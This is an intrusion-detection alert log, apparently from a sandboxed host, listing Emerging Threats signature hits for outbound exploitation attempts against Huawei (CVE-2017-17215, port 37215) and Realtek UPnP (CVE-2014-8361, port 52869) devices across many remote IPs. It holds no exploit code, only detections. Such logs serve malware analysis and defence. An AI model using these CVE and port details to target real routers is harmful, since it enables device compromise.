                                      07/20/24-23:01:42.812448TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5285452869192.168.2.23219.68.37.27
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626037215192.168.2.23157.234.41.166
                                      07/20/24-23:01:31.975513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297637215192.168.2.23197.162.41.254
                                      07/20/24-23:01:11.816521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3880837215192.168.2.23217.234.58.254
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814237215192.168.2.23197.21.129.208
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.23177.172.21.105
                                      07/20/24-23:01:42.470759TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25733252869192.168.2.231.167.45.35
                                      07/20/24-23:01:21.966302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345437215192.168.2.2341.66.223.29
                                      07/20/24-23:01:42.944341TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142252869192.168.2.23187.178.228.43
                                      07/20/24-23:01:44.602081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5214052869192.168.2.23150.181.137.93
                                      07/20/24-23:01:34.044417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470637215192.168.2.23202.243.3.110
                                      07/20/24-23:01:13.204741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615207052869192.168.2.23100.41.144.113
                                      07/20/24-23:01:56.950526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951252869192.168.2.232.74.163.138
                                      07/20/24-23:01:42.072139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5653652869192.168.2.23113.116.9.186
                                      07/20/24-23:01:42.608320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3849652869192.168.2.23220.210.17.223
                                      07/20/24-23:01:09.027075TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23288052869192.168.2.23189.63.115.173
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711637215192.168.2.2341.155.124.93
                                      07/20/24-23:01:12.841280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4604052869192.168.2.23143.147.165.127
                                      07/20/24-23:01:11.816277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412437215192.168.2.2362.86.14.116
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227037215192.168.2.23197.196.115.165
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599637215192.168.2.23157.115.232.41
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500637215192.168.2.23141.121.89.226
                                      07/20/24-23:01:20.175900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009237215192.168.2.23165.70.37.218
                                      07/20/24-23:01:11.817298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014637215192.168.2.2379.233.85.196
                                      07/20/24-23:01:58.249042TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615318652869192.168.2.2373.13.167.32
                                      07/20/24-23:01:08.606848TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23926052869192.168.2.2377.76.243.3
                                      07/20/24-23:01:43.085956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615742252869192.168.2.23104.39.87.115
                                      07/20/24-23:01:45.591520TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25300652869192.168.2.23200.248.84.13
                                      07/20/24-23:01:13.310941TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3429852869192.168.2.23144.166.152.235
                                      07/20/24-23:00:59.191389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607237215192.168.2.23169.239.10.111
                                      07/20/24-23:01:04.236014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616063452869192.168.2.23124.254.84.115
                                      07/20/24-23:01:07.026812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738237215192.168.2.23126.151.179.206
                                      07/20/24-23:01:25.509340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615615652869192.168.2.2340.231.162.161
                                      07/20/24-23:01:02.085856TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656652869192.168.2.23113.34.69.120
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563037215192.168.2.23116.187.119.26
                                      07/20/24-23:01:44.464382TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616051052869192.168.2.23141.54.172.151
                                      07/20/24-23:01:43.058685TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616042452869192.168.2.2346.141.217.184
                                      07/20/24-23:01:42.165780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5770652869192.168.2.23160.40.68.243
                                      07/20/24-23:01:02.259207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615549852869192.168.2.23191.173.38.241
                                      07/20/24-23:01:20.152427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395037215192.168.2.23118.213.243.211
                                      07/20/24-23:01:41.758923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25862852869192.168.2.2320.44.163.254
                                      07/20/24-23:01:43.141970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697052869192.168.2.23203.253.92.60
                                      07/20/24-23:01:56.447869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25548652869192.168.2.2373.161.205.249
                                      07/20/24-23:02:02.527007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614734852869192.168.2.23138.206.228.107
                                      07/20/24-23:01:58.688552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613788052869192.168.2.23131.180.1.65
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895037215192.168.2.2398.137.112.190
                                      07/20/24-23:01:43.380019TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24967452869192.168.2.23128.197.233.56
                                      07/20/24-23:00:59.168569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470237215192.168.2.23221.83.41.173
                                      07/20/24-23:02:05.287905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5588052869192.168.2.23221.139.54.252
                                      07/20/24-23:01:43.392835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25127052869192.168.2.2331.247.155.57
                                      07/20/24-23:01:45.878385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615070852869192.168.2.23190.134.62.33
                                      07/20/24-23:01:31.328855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25388852869192.168.2.23203.166.233.2
                                      07/20/24-23:01:43.085956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615540452869192.168.2.23194.44.142.130
                                      07/20/24-23:01:01.219232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874852869192.168.2.23189.63.115.173
                                      07/20/24-23:01:14.207040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331237215192.168.2.23161.238.126.206
                                      07/20/24-23:01:04.100971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985037215192.168.2.23157.132.15.197
                                      07/20/24-23:01:02.057729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113237215192.168.2.23157.212.218.203
                                      07/20/24-23:01:43.288086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5726052869192.168.2.2317.63.153.183
                                      07/20/24-23:01:53.415663TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25673852869192.168.2.23100.28.35.63
                                      07/20/24-23:01:58.751559TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614349252869192.168.2.23206.198.46.124
                                      07/20/24-23:01:24.833522TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614823652869192.168.2.2348.111.4.84
                                      07/20/24-23:01:46.471349TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614275252869192.168.2.23173.232.109.220
                                      07/20/24-23:01:42.485253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615044852869192.168.2.23145.203.252.98
                                      07/20/24-23:01:50.985732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4178652869192.168.2.23209.10.74.49
                                      07/20/24-23:01:55.497526TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615553652869192.168.2.23135.85.2.136
                                      07/20/24-23:01:52.285243TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24785052869192.168.2.23126.2.96.116
                                      07/20/24-23:01:31.323042TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23888052869192.168.2.23145.117.47.181
                                      07/20/24-23:01:01.198681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615195452869192.168.2.23100.7.167.160
                                      07/20/24-23:01:41.332211TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5147052869192.168.2.23220.250.27.9
                                      07/20/24-23:02:07.294006TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23710852869192.168.2.23194.45.44.116
                                      07/20/24-23:01:42.693537TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614493652869192.168.2.23157.155.242.14
                                      07/20/24-23:01:02.103737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628437215192.168.2.23104.38.28.110
                                      07/20/24-23:01:42.442442TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25582852869192.168.2.23171.82.217.243
                                      07/20/24-23:01:47.028157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5462052869192.168.2.23136.248.242.20
                                      07/20/24-23:01:11.638042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135637215192.168.2.23157.158.215.83
                                      07/20/24-23:01:46.562532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614158452869192.168.2.23198.167.255.95
                                      07/20/24-23:01:59.296959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994852869192.168.2.23118.179.102.207
                                      07/20/24-23:01:08.585790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25326452869192.168.2.23194.63.61.192
                                      07/20/24-23:01:53.262556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23951452869192.168.2.23109.27.210.57
                                      07/20/24-23:01:34.045749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059437215192.168.2.23157.81.54.196
                                      07/20/24-23:01:51.888686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615101652869192.168.2.2341.47.146.130
                                      07/20/24-23:01:02.113054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704237215192.168.2.23148.121.203.188
                                      07/20/24-23:01:31.318206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25756052869192.168.2.23119.38.147.179
                                      07/20/24-23:02:13.277683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5229252869192.168.2.2331.110.77.22
                                      07/20/24-23:01:48.322055TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615327052869192.168.2.23134.173.191.58
                                      07/20/24-23:01:25.819962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993652869192.168.2.23156.32.87.120
                                      07/20/24-23:01:40.334452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188837215192.168.2.2341.52.100.172
                                      07/20/24-23:01:20.601040TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5701652869192.168.2.2385.106.41.174
                                      07/20/24-23:01:47.641942TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25654452869192.168.2.23113.35.167.52
                                      07/20/24-23:02:08.206268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615303452869192.168.2.2327.234.34.183
                                      07/20/24-23:01:42.322405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4948452869192.168.2.235.80.243.157
                                      07/20/24-23:01:31.981855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049437215192.168.2.23197.97.192.157
                                      07/20/24-23:02:06.441271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614622652869192.168.2.2336.224.134.244
                                      07/20/24-23:01:00.647694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986237215192.168.2.23197.92.38.185
                                      07/20/24-23:01:40.310207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102037215192.168.2.2341.28.95.234
                                      07/20/24-23:01:51.130270TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5116852869192.168.2.23135.69.136.147
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501837215192.168.2.23157.87.189.85
                                      07/20/24-23:01:31.333070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23797452869192.168.2.23152.161.99.53
                                      07/20/24-23:01:34.075219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172237215192.168.2.23197.145.148.31
                                      07/20/24-23:01:43.180913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5443852869192.168.2.23219.230.144.186
                                      07/20/24-23:01:03.102525TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613607252869192.168.2.232.10.234.63
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3408837215192.168.2.2341.53.235.233
                                      07/20/24-23:02:11.791090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726052869192.168.2.2384.123.73.220
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966637215192.168.2.23198.55.153.11
                                      07/20/24-23:01:31.322110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476652869192.168.2.23109.162.13.246
                                      07/20/24-23:01:41.374418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5830852869192.168.2.23157.9.32.210
                                      07/20/24-23:01:59.992284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4764452869192.168.2.23161.136.114.82
                                      07/20/24-23:01:02.304416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613765452869192.168.2.23162.220.3.30
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478837215192.168.2.23148.60.185.225
                                      07/20/24-23:01:11.636425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026437215192.168.2.2341.248.82.51
                                      07/20/24-23:01:43.724924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5028452869192.168.2.23155.182.30.66
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359437215192.168.2.23157.156.179.148
                                      07/20/24-23:00:57.222207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979637215192.168.2.23197.52.45.132
                                      07/20/24-23:01:02.365539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040052869192.168.2.23114.20.70.247
                                      07/20/24-23:01:02.113054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567237215192.168.2.23157.106.83.239
                                      07/20/24-23:01:42.945747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4496452869192.168.2.2377.249.102.196
                                      07/20/24-23:01:54.482793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4205852869192.168.2.23163.75.91.9
                                      07/20/24-23:01:40.296076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924037215192.168.2.2341.234.203.207
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671237215192.168.2.2341.198.76.252
                                      07/20/24-23:01:08.560530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4968052869192.168.2.23109.23.172.87
                                      07/20/24-23:01:42.187124TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601052869192.168.2.23186.68.76.128
                                      07/20/24-23:01:53.415663TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24298852869192.168.2.23197.114.179.188
                                      07/20/24-23:01:49.064169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25273852869192.168.2.23210.209.80.73
                                      07/20/24-23:01:42.874808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23889852869192.168.2.23208.138.181.205
                                      07/20/24-23:01:52.094111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614835652869192.168.2.23107.137.22.219
                                      07/20/24-23:01:08.672944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26084652869192.168.2.23140.186.145.164
                                      07/20/24-23:01:25.980169TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614783452869192.168.2.23157.217.190.133
                                      07/20/24-23:01:31.327539TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3775452869192.168.2.23174.98.46.120
                                      07/20/24-23:01:44.841232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5734252869192.168.2.23158.186.31.24
                                      07/20/24-23:01:50.798234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5390452869192.168.2.23144.196.193.162
                                      07/20/24-23:02:05.544188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613367252869192.168.2.23108.147.254.33
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744637215192.168.2.2341.95.94.208
                                      07/20/24-23:01:48.161610TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616016852869192.168.2.2398.169.154.123
                                      07/20/24-23:01:03.219817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3448252869192.168.2.2380.176.127.107
                                      07/20/24-23:01:41.165469TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874452869192.168.2.23118.130.245.154
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841437215192.168.2.23171.210.254.194
                                      07/20/24-23:01:56.265254TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23357852869192.168.2.23216.27.105.182
                                      07/20/24-23:01:02.104572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644037215192.168.2.2341.205.220.16
                                      07/20/24-23:01:58.093784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4908252869192.168.2.2364.27.46.251
                                      07/20/24-23:01:42.571884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709852869192.168.2.23172.43.240.212
                                      07/20/24-23:01:43.160906TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613498652869192.168.2.2350.208.25.112
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634237215192.168.2.23157.218.32.62
                                      07/20/24-23:01:46.159872TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24769652869192.168.2.23208.122.170.150
                                      07/20/24-23:01:04.058922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812037215192.168.2.23157.46.25.223
                                      07/20/24-23:02:36.102280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24629652869192.168.2.2368.53.164.7
                                      07/20/24-23:01:59.938491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4150652869192.168.2.23120.69.102.249
                                      07/20/24-23:01:41.389908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615845452869192.168.2.23170.207.21.198
                                      07/20/24-23:01:49.064169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24331252869192.168.2.23203.94.134.229
                                      07/20/24-23:01:58.807611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4924252869192.168.2.23162.84.55.247
                                      07/20/24-23:01:20.169339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926837215192.168.2.2313.220.244.166
                                      07/20/24-23:01:31.979565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501037215192.168.2.2341.115.9.128
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524637215192.168.2.2337.246.135.67
                                      07/20/24-23:01:08.684499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4440452869192.168.2.23167.134.108.32
                                      07/20/24-23:01:49.567841TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24650052869192.168.2.23180.71.140.26
                                      07/20/24-23:01:31.983105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.2341.44.12.1
                                      07/20/24-23:01:47.902509TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24429052869192.168.2.23206.59.132.204
                                      07/20/24-23:01:43.944379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781252869192.168.2.2365.50.132.254
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405437215192.168.2.23197.144.175.34
                                      07/20/24-23:01:49.567841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318652869192.168.2.23213.235.51.156
                                      07/20/24-23:01:42.048889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5334452869192.168.2.2380.2.7.209
                                      07/20/24-23:01:46.308516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5494252869192.168.2.2392.64.232.40
                                      07/20/24-23:01:24.883172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080637215192.168.2.23157.83.52.0
                                      07/20/24-23:01:55.666677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4432652869192.168.2.23168.75.31.114
                                      07/20/24-23:02:08.246802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5022452869192.168.2.2383.250.249.17
                                      07/20/24-23:01:13.047601TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614296052869192.168.2.2347.250.162.49
                                      07/20/24-23:01:42.778817TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24683652869192.168.2.23173.176.211.200
                                      07/20/24-23:01:27.658221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489637215192.168.2.23197.88.10.152
                                      07/20/24-23:01:02.349095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613479652869192.168.2.23171.201.20.41
                                      07/20/24-23:01:45.519802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24096652869192.168.2.2352.182.197.150
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665037215192.168.2.23110.243.142.209
                                      07/20/24-23:02:05.311710TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614682652869192.168.2.2347.224.141.66
                                      07/20/24-23:01:50.280308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24291452869192.168.2.2318.202.42.80
                                      07/20/24-23:00:59.211046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817637215192.168.2.2341.20.53.198
                                      07/20/24-23:01:11.818830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918237215192.168.2.2341.199.105.92
                                      07/20/24-23:01:47.604426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4806052869192.168.2.2389.230.177.62
                                      07/20/24-23:01:52.543362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25133652869192.168.2.23116.175.162.178
                                      07/20/24-23:01:02.422228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615752252869192.168.2.23104.178.230.186
                                      07/20/24-23:01:24.889163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.23197.216.241.164
                                      07/20/24-23:01:31.991336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120037215192.168.2.23184.160.174.234
                                      07/20/24-23:01:03.930422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615504052869192.168.2.23111.252.253.89
